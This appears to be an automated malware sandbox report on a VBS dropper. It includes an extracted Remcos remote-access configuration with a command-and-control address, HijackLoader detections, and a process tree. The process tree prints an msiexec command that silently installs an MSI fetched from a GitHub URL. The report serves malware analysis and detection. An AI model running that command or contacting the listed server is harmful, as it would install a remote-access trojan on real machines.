Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
30-01-2025 20:01
Static task
static1
Behavioral task
behavioral1
Sample
secondaryTask.vbs
Resource
win7-20240903-en
General
-
Target
secondaryTask.vbs
-
Size
512B
-
MD5
bcc1d6a3c9aeec994cd31f86ada37ae6
-
SHA1
0b7bb7af96d842cfbb7a89793a4292fec4289a8c
-
SHA256
41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64
-
SHA512
8793e62dc4a9465ef5254e15b3471573a242705dfdf74bd3d09d97c10dd84daf69aa8c0b5c9bc3c5a7302e431fc2ed417b1e6c194da106765e50ad385ea955b7
Malware Config
Extracted
remcos
v2
185.157.162.126:1995
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
qsdazeazd-EL00KX
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detects HijackLoader (aka IDAT Loader) 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023cb5-49.dat family_hijackloader -
HijackLoader
HijackLoader is a multistage loader first seen in 2023.
-
Hijackloader family
-
Remcos family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 4272 EHttpSrv.exe -
Loads dropped DLL 7 IoCs
pid Process 3752 MsiExec.exe 3752 MsiExec.exe 3752 MsiExec.exe 3752 MsiExec.exe 4272 EHttpSrv.exe 4272 EHttpSrv.exe 2540 EHttpSrv.exe -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 3908 msiexec.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 15 2972 msiexec.exe 20 2972 msiexec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 raw.githubusercontent.com 20 raw.githubusercontent.com -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4272 set thread context of 4820 4272 EHttpSrv.exe 90 PID 4820 set thread context of 2540 4820 cmd.exe 95 -
Drops file in Program Files directory 8 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\PackagerUpdt\audiogram.tif msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\http_dll.dll msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\mfc80u.dll msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\Microsoft.VC80.CRT.manifest msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\Microsoft.VC80.MFC.manifest msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\Microsoft.VC80.MFCLOC.manifest msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\msvcr80.dll msiexec.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIBD08.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBD97.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIBDD7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB788.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBC0D.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIBD77.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EHttpSrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EHttpSrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2972 msiexec.exe 2972 msiexec.exe 4272 EHttpSrv.exe 4820 cmd.exe 4820 cmd.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4272 EHttpSrv.exe 4820 cmd.exe 4820 cmd.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeShutdownPrivilege 3908 msiexec.exe Token: SeIncreaseQuotaPrivilege 3908 msiexec.exe Token: SeSecurityPrivilege 2972 msiexec.exe Token: SeCreateTokenPrivilege 3908 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3908 msiexec.exe Token: SeLockMemoryPrivilege 3908 msiexec.exe Token: SeIncreaseQuotaPrivilege 3908 msiexec.exe Token: SeMachineAccountPrivilege 3908 msiexec.exe Token: SeTcbPrivilege 3908 msiexec.exe Token: SeSecurityPrivilege 3908 msiexec.exe Token: SeTakeOwnershipPrivilege 3908 msiexec.exe Token: SeLoadDriverPrivilege 3908 msiexec.exe Token: SeSystemProfilePrivilege 3908 msiexec.exe Token: SeSystemtimePrivilege 3908 msiexec.exe Token: SeProfSingleProcessPrivilege 3908 msiexec.exe Token: SeIncBasePriorityPrivilege 3908 msiexec.exe Token: SeCreatePagefilePrivilege 3908 msiexec.exe Token: SeCreatePermanentPrivilege 3908 msiexec.exe Token: SeBackupPrivilege 3908 msiexec.exe Token: SeRestorePrivilege 3908 msiexec.exe Token: SeShutdownPrivilege 3908 msiexec.exe Token: SeDebugPrivilege 3908 msiexec.exe Token: SeAuditPrivilege 3908 msiexec.exe Token: SeSystemEnvironmentPrivilege 3908 msiexec.exe Token: SeChangeNotifyPrivilege 3908 msiexec.exe Token: SeRemoteShutdownPrivilege 3908 msiexec.exe Token: SeUndockPrivilege 3908 msiexec.exe Token: SeSyncAgentPrivilege 3908 msiexec.exe Token: SeEnableDelegationPrivilege 3908 msiexec.exe Token: SeManageVolumePrivilege 3908 msiexec.exe Token: SeImpersonatePrivilege 3908 msiexec.exe Token: SeCreateGlobalPrivilege 3908 msiexec.exe Token: SeRestorePrivilege 2972 msiexec.exe Token: SeTakeOwnershipPrivilege 2972 msiexec.exe Token: SeRestorePrivilege 2972 msiexec.exe Token: SeTakeOwnershipPrivilege 2972 msiexec.exe Token: SeRestorePrivilege 2972 msiexec.exe Token: SeTakeOwnershipPrivilege 2972 msiexec.exe Token: SeRestorePrivilege 2972 msiexec.exe Token: SeTakeOwnershipPrivilege 2972 msiexec.exe Token: SeRestorePrivilege 2972 msiexec.exe Token: SeTakeOwnershipPrivilege 2972 msiexec.exe Token: SeRestorePrivilege 2972 msiexec.exe Token: SeTakeOwnershipPrivilege 2972 msiexec.exe Token: SeRestorePrivilege 2972 msiexec.exe Token: SeTakeOwnershipPrivilege 2972 msiexec.exe Token: SeRestorePrivilege 2972 msiexec.exe Token: SeTakeOwnershipPrivilege 2972 msiexec.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 1900 wrote to memory of 3908 1900 WScript.exe 83 PID 1900 wrote to memory of 3908 1900 WScript.exe 83 PID 2972 wrote to memory of 3752 2972 msiexec.exe 88 PID 2972 wrote to memory of 3752 2972 msiexec.exe 88 PID 2972 wrote to memory of 3752 2972 msiexec.exe 88 PID 2972 wrote to memory of 4272 2972 msiexec.exe 89 PID 2972 wrote to memory of 4272 2972 msiexec.exe 89 PID 2972 wrote to memory of 4272 2972 msiexec.exe 89 PID 4272 wrote to memory of 4820 4272 EHttpSrv.exe 90 PID 4272 wrote to memory of 4820 4272 EHttpSrv.exe 90 PID 4272 wrote to memory of 4820 4272 EHttpSrv.exe 90 PID 4272 wrote to memory of 4820 4272 EHttpSrv.exe 90 PID 4820 wrote to memory of 2540 4820 cmd.exe 95 PID 4820 wrote to memory of 2540 4820 cmd.exe 95 PID 4820 wrote to memory of 2540 4820 cmd.exe 95 PID 4820 wrote to memory of 2540 4820 cmd.exe 95 PID 4820 wrote to memory of 2540 4820 cmd.exe 95
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\secondaryTask.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi" /qn2⤵
- Use of msiexec (install) with remote resource
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8983F0AC0285260764C6B211635B8FD92⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3752
-
-
C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2540
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD548c6ae1a5f719273ce078e99e1dd9e85
SHA1a1bcb64cc747041e04a298394e5c20634d54a0e7
SHA256dbe4ac9c6837c878cd8a280581098c4d546b7057af5501121cfc91e83a3b6fa3
SHA5128da2fd90ec318af744d3f59dda4f0a94460340a987ba9974890437bc4392ebb0aef456d24e2e9f455eb243955ae0509d1f73876ab75e50f8e3435b1650cce491
-
Filesize
20KB
MD59329ba45c8b97485926a171e34c2abb8
SHA120118bc0432b4e8b3660a4b038b20ca28f721e5c
SHA256effa6fcb8759375b4089ccf61202a5c63243f4102872e64e3eb0a1bdc2727659
SHA5120af06b5495142ba0632a46be0778a7bd3d507e9848b3159436aa504536919abbcacd8b740ef4b591296e86604b49e0642fee2c273a45e44b41a80f91a1d52acc
-
Filesize
1.0MB
MD5686b224b4987c22b153fbb545fee9657
SHA1684ee9f018fbb0bbf6ffa590f3782ba49d5d096c
SHA256a2ac851f35066c2f13a7452b7a9a3fee05bfb42907ae77a6b85b212a2227fc36
SHA51244d65db91ceea351d2b6217eaa27358dbc2ed27c9a83d226b59aecb336a9252b60aec5ce5e646706a2af5631d5ee0f721231ec751e97e47bbbc32d5f40908875
-
Filesize
877KB
MD55124236fd955464317fbb1f344a1d2f2
SHA1fe3a91e252f1dc3c3b4980ade7157369ea6f5097
SHA256ed1389002cdf96c9b54de35b6e972166ee3296d628943fd594a383e674c5cba6
SHA5122b2ac23244b16f936ef9a4049586f58c809fcc4391a56390cc5db2e8d96140001e0b977680ed1d8b0ab9c410e865a880209e22add8d42e563dc40bc91236b252
-
Filesize
2.3MB
MD51e2a640f1a98da16fc61c865cec7d54e
SHA1178563fab7b06e99551f66ba090d0911205a2fe4
SHA256e296a18272a7bde471f37e51d49e6febe944ed4e78a2d5e79f1b2ee3330fb10f
SHA5122426b1ce2bd01af6f34c56e1ef0290e521566ae1196a15aeb594bcf33793aa405ce01b4196bfe48de33320bab7a570a55110995025c54edcf790c2d10166fa9c
-
Filesize
1.0MB
MD5ee00dce3815c19020f923df84d0b285a
SHA1f5ea821dd425a3b97fc8b446eaf7819e65a5af3a
SHA2563c0b2547625c8629a5ad298a47f201643225cc76563f256c7dadc2f5ade75853
SHA51272ce5082472ca2bf26db0abfcdcc3abd3e99df43ed536476944a447138b1bc393db0f41307ff832c35d35d7689e8e32054a673c296cdcdb1b129e45af2510add
-
Filesize
4.3MB
MD58e31046891c36ca794fb01262cd890d9
SHA17f812da89f328e871290be32bdead1fc869377d6
SHA256d03d7ea5956a5d9ca6c1b1af800350b6ef400815b452f69a886f4156ba1a3ec5
SHA51295c4c8f0196a8e373913fc41eb44c70fa8abbea38324993aa42ca05be5d6229430a4e2a4671a914a4f00986b75845c247a91809aae994ff835aa56614606840d
-
Filesize
557KB
MD52c9c51ac508570303c6d46c0571ea3a1
SHA1e3e0fe08fa11a43c8bca533f212bdf0704c726d5
SHA256ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550
SHA512df5f1def5aac44f39a2dfde9c6c73f15f83a7374b4ad42b67e425ccb7ac99a64c5701b676ae46d2f7167a04a955158031a839e7878d100aaf8fab0ce2059f127